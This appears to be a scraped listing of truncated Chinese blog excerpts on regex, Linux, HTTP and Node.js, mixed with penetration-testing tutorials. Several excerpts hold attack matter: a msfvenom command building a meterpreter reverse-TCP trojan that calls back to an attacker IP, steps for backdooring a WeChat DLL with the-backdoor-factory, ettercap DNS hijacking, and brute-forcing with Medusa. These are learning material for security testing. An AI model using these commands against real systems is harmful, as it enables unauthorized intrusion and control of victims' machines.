js正则表达式,用单个字符串描述或者匹配符合特定语句规则的字符串,相当于一种搜索模式.一些字符序列组合在一起,可以简单也可以复杂模式的,可以去搜索还可以替换 正则表达式语法/表达式/修饰符(可选),例如 var a=/sym/i; 输入sym SYM sYm都可以匹配,i修饰符不区分大小写,正则可以用来搜索和替换使用search()搜索,replace()替换,去和正则表达式结合使用 修饰符i,忽略大小写g,全局匹配m,多行匹配 正则表达式常用模式方括号用于查找某个范围内的字符:[abc],查找…

小编相信很多新手都会遇到以下几个问题 1.零基础想学渗透怎么入手? 2.学习web渗透需要从哪里开始? 这让很多同学都处于迷茫状态而迟迟不下手,小编就在此贴给大家说一下web渗透的学习路线,希望对大家有帮助 同时本博客也会按照学习路线推出渗透学习教学教程,希望大家能多多支持 本博客地址:http://www.cnblogs.com/cnhacker/ Web安全相关概念熟悉基本概念(SQL注入.上传.XSS.CSRF.一句话木马等). 通过关键字(SQL注入.上传.XSS.CSRF.一句话木马等…

代理查询网站:hidemyass(隐藏我的屁股) HTTrack:HTTrack是一个免费和易用的离线浏览工具(浏览器),它可以允许你下载整个WWW网站至本地目录,并且通过遍历网站目录获取HTML,图片和其他文件,是安全渗透测试和居家旅行必备软件.…

python -m SimpleHTTPServer gedit 文本编辑器 apache2 默认配置文件目录:/etc/apache2/apache2默认首页源码: /var/www/html mysql数据库sudo mysql -uroot -pshow databases; 查看所有数据库select user(); 查看当前用户 mysql默认配置文件:/etc/mysql/mysql.conf.d/mysql.cnfmysql远程连接:编辑文件,注释掉 bind-address 12…

从头开始积累centos7系统运用 大牛博客:https://blog.51cto.com/yangrong/p5 1.文件的属性(文件的信息描述): [root@python01 ~]# ls -lihtotal 24K100663363 -rw-------.  1 root root 1.6K May 24 23:28 anaconda-ks.cfg101300544 -rw-r--r--.  1 root root  15K Oct  3  2017 epel-release-lates…

将JavaScript 插入网页的方法 使用<script>标签在网页中插入Javascript代码. 插入JavaScript 与在网页中插入CSS的方式相似.使用下面的代码可以在网页中插入JavaScript: <scripttype="text/JavaScript">     ... </script> 其中的...就是代码的内容.JavaScript的插入位置不同,效果也会有所不同,还可以像CSS一样,将JavaScript保存成一个外部文…

一侦查 研究如何收集有关目标的情报,比如开发那些端口用来通信,托管在哪里,提供给客户的服务类型等. 交付内容应该包括需要攻击的所有目标资产清单,与那些资产关联的应用,使用的服务以及可能的资产所有者. 侦查目标: 找出目标 定义应用和商业用途 找出系统类型 找出可用端口 找出运行的服务 对信息进行社会工程 记录发现的内容 二目标测试 测试出目标的薄弱环节 找出容易受攻击的系统,并确定起优先级 讲易受攻击的系统和资产所有者进行映射 记录发现的内容 三漏洞利用 目标 漏洞利用 拿到权限 抓取非授权数据…

.4. HTTP标准 1.4.1. 报文格式 1.4.1.1. 请求报文格式 <method><request-URL><version> <headers> <entity-body> 1.4.1.2. 响应报文格式 <version><status><reason-phrase> <headers> <entity-body> 1.4.1.3.字段解释 method HTTP动词 常…

1.apt-get install python-nmap 2.apt-get install python-setuptools 正在读取软件包列表... 完成 正在分析软件包的依赖关系树       正在读取状态信息... 完成       python-setuptools 已经是最新的版本. python-setuptools 已设置为手动安装. 下列软件包是自动安装的并且现在不需要了:   libct4 libmapi0 libmapiadmin0 libocpf0 libsubuni…

从头开始积累centos7系统运用 大牛博客: https://blog.51cto.com/yangrong/p5 https://blog.oldboyedu.com/ 文件的权限 rw-r--r-- 1 root root   aduser.txt r:read 读  4 w:write 写 2 x:execute 执行 1 -:没有权限 0 当selinux开启是创建文件及文件夹会有点,关闭则没有. [root@python01 ~]# ls -lhi total 24K10066336…

第一章 Linux是什么 1.Linux是什么 一套操作系统 早期的Linux是针对386开发的 具有可移植性 2.Unix及Linux的发展史 1973年,Unix诞生,Ritchie等人以C语言写出第一个Unix内核 1977年,在Unix基础上对内核源码修改,增加了许多工具软件和编译程序,BSD(Berkeley Software Distribution)诞生 1984年,x86架构的Minix操作系统诞生 1984年,GNU(GNU's not Unix)项目和FSF(Free Sof…

python的正则表达式模块是re,替换相关的方法是sub. 例如我们要做如下的替换将所有的 替换为空格,可以通过下面代码实现: import re input = 'hello world' #第一个参数是正则表达式,第二个参数是要替换成的内容,第三个参数是替换原字符串 output = re.sub(' ', ' ',input) print output 如果要做分组替换需要在替换的字符串中指定分组\1, 反斜杠+数字表示替换第n个分组 例如假定我要把abc此处在&nbsp和;之间的字符串…

用命令 ls -al可以列出当前所有档案,和档案的各种情况 第一块是档案属性:一共10个,第一个代表档案类型 {d:目录,-:档案,l:连接档,b:接口设备,c:串行端口设备},接下来是三个一组,第一组:拥有者的权限,第二组:同组的权限,第三组:其他人非本组的权限(rwx代表读写执行)如果没有个x属性,则无法进入查看 第二块是连接占用的节点:如果是目录,则与该目录下还有多少目录有关 第三块为档案的拥有者 第四块为拥有人的群组 第五块为档案容量大小 第六块为档案建档日期/修改日期 第七块为档案名(…

alert(/[abc]/.test("c")); //true alert("a bat ,a Cat,a fAt bat ,a faT cat".match(/[bcf]at/gi)); //bat,Cat,fAt,bat,faT,cat reg.test(str) str.match(reg)…

使用C#winform编写渗透测试工具--敏感目录扫描 由于之前在做渗透测试的时候,发现使用的工具较多,切换起来较麻烦,便萌生了开发一个包含各种渗透测试工具的小程序,包括敏感目录扫描.端口查询.子域名挖掘.旁站查询.密码暴力破解.SQL注入等功能.这一篇主要介绍敏感目录扫描部分的原理和设计,软件的整体效果如下图所示. 目录 使用C#winform编写客户端软件 使用python编写脚本实现网站敏感目录扫描 C#调用脚本的方法 效果展示 一.使用C#winform编写客户端软件 网上有许多这方面的…

目录 1.4 小试牛刀 1.4.1 信息搜集 whois查询 服务指纹识别 端口扫描 综合性扫描 1.4.2 发现漏洞 1.4.3 攻击与权限维持 小结 1.4 小试牛刀 本节作为第一章的最后一节,给大家展示一个渗透测试的简单示例.该示例操作简单,环境真实,主要是为了给您一个整体上的感知,同时提升学习渗透测试的兴趣.渗透测试的每一步并没有记录完整的细节信息. 首先,我选择了一个测试站点,下面对该站点www.xxxxoooo.cn,下面对其进行渗透测试. 1.4.1 信息搜集 whois查询 因为…

Kali Linux Web 渗透测试— 第四课 google hack 实战 文/玄魂 目录 shellKali Linux Web 渗透测试— 第四课 google hack 实战 课程目录 Googlehack基础知识 寻找持续构建工具Jenkins的管理面板 搞定xampp 后门查找 关于google hack database 教程地址:第四课 google hack 实战 课程目录      1.寻找持续构建工具Jenkins的管理面板,有可能获取某些项目的源代码或者敏感信息 2.综…

1.渗透测试基础内容 https://blog.csdn.net/Fly_hps/article/details/79492646 2.Metasploit基础 https://blog.csdn.net/Fly_hps/article/details/79493487 3.情报收集 https://blog.csdn.net/Fly_hps/article/details/79497893 4.漏洞扫描 https://blog.csdn.net/Fly_hps/article/details…

渗透测试集成环境Faraday   Kali Linux集成了海量的渗透测试工具.但是这些工具在使用的时候,还是分离的.虽然用户可以通过Shell.日志/报告导入导出功能等方式,进行整合,但是仍然不便于分析.   Faraday提出了IPE(Integrated Penetration Environment,渗透测试集成环境)的概念.它是一款类似编程IDE的工具,他将大量的工具整合在一起.用户只需要在内置的终端进行操作,Faraday就会分析执行结果,自动进行整合,便于用户进行分析.在该软件的…

写完正则在浏览器上检测自己写得对不对实在是不方便,于是就撸了一个JS正则小demo出来. demo demo展示 项目地址 代码部分 首先把布局样式先写好. <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>js正则查找替换工具</title> <link rel="stylesheet&q…

该文章仅供学习,利用方法来自网络文章,仅供参考 the-backdoor-factory-master(后门工制造厂)原理:可执行二进制文件中有大量的00,这些00是不包含数据的,将这些数据替换成payload,并且在程序执行的时候,jmp到代码段,来触发payload. 测试靶机环境,win7系统,wechat(微信)2.6.8 靶机ip:192.168.190.129 目标:利用the-backdoor-factory-master对微信自己的dll动态连接文件植入后门,等微信运行之后,反弹…

Medusa(美杜莎)暴力破解使用 该文章仅供学习,利用方法来自网络文章,仅供参考 一.简介 medusa(美杜莎)是一个速度快,支持大规模并行,模块化,爆破登陆,可以同时对多个主机,用户或是密码执行强力测试,medusa和hydra一样,同样属于在线破解工具,不同的是,medusa的稳定性相较于hydra要好很多但是支持的模块相对于hydra少一些. 二,语法参数 medusha [-h host主机 或 -H file主机文件] [-u username 用户名 或 -U file用户名字典…

sunny.exe clientid 隧道ID route -n 查看网关netstat -rn 查看网关 DNS劫持ettercap用来内网渗透测试使用,可以嗅探内网,DNS劫持等攻击1,在攻击者电脑上,搭建web服务器2,终端打开ettercap的DNS文件,/etc/ettercap/etter.dns,在其中添加欺骗的A记录和PTR记录3,输入ettercap -G打开ettercap工具图形化界面4,开始主机扫描,在sniff选项下,选择 unified sniffing,选择需要嗅探…

使用kali下metasploit生成木马,控制windows系统 kali基于debin的数字取证系统,上面集成了很多渗透测试工具,前身为bt r3(BrackTrack) Metasploit,是综合利用工具,使用Ruby开发,使用方便 msfconsole进入工具 MSF,依赖postgresql数据库,在使用MSF前要开启数据库 msfvenom:生成木马msfvenon -p windows/meterpreter/reverse_tcp lhost=kali ip地址 lport=5…

渗透测试工具BurpSuite做网站的安全测试(基础版) 版权声明:本文为博主原创文章,未经博主允许不得转载. 学习网址: https://t0data.gitbooks.io/burpsuite/content/chapter4.html 用命令打开burpsuite工具:jar /your_burpsuite_path/burpSuite.jar <<BurpSuite_pro_v1.6.27.zip>> BurpSuite 如何扫描web漏洞: http://www.myha…

Node.js基础学习 简介 简单的说 Node.js 就是运行在服务端的 JavaScript.Node.js 是一个基于Chrome JavaScript 运行时建立的一个平台.Node.js是一个事件驱动I/O服务端JavaScript环境,基于Google的V8引擎,V8引擎执行Javascript的速度非常快,性能非常好 安装 à安装node.js 在官网安装自己win版本的node.js的版本,下载,安装完毕后在运行中输入node -v若是出现版本号就证明安装成功. à安装npm(模…

近来一直在学习js和jquery.刚刚进入前端工作还没有多久,虽然大学里学习的是编程自认为也学的还可以,但前端接触的不多,一直认为前端十分简单.其实不然,特别是工作的时候要自己设计一个完整的项目前端,发现其中还是有许多的问题,需要去摸索的.因为项目的需求,我其实先学的是jquery,但jquery是基于js的所以我差不多是两者一起学习.近来项目已经进行了一段时间,所以想记录一下自己学习的过程,分享一点微薄经验给大家.如果有什么问题,十分乐意大家指出. (一).javascript的核心: 1.E…

本篇文章较为详细的讲述了通过node.js的已知漏洞来完成渗透测试的过程,介绍了node.js存在的漏洞可以在多种工具下的不同利用方式.因为我认为会对论坛部分web安全新手有所帮助,所以整理到论坛中. PentestingNode.js Application : Nodejs Application Security 原文地址:http://www.websecgeeks.com/2017/04/pentesting-nodejs-application-nodejs.html 由prison…

继续来学习metasploit...记好笔记是很重要的,下面开始正文: 二.WEB应用渗透技术     1.WEB应用渗透基础知识        先介绍WEB应用攻击的主要类型(大致介绍,具体请自行查询)         Sql注入攻击:大致分为 普通注入和盲注         跨站脚本(XSS): 分为存储型XSS,反射性XSS以及DOM型XSS         跨站伪造请求(CSRF):以XSS方式注入一段脚本,受害者点击该脚本时,脚本伪造受害者发出请求.         会话认证管理缺陷:…

转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过. > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能.然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门. sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞.它由python语言开发而成…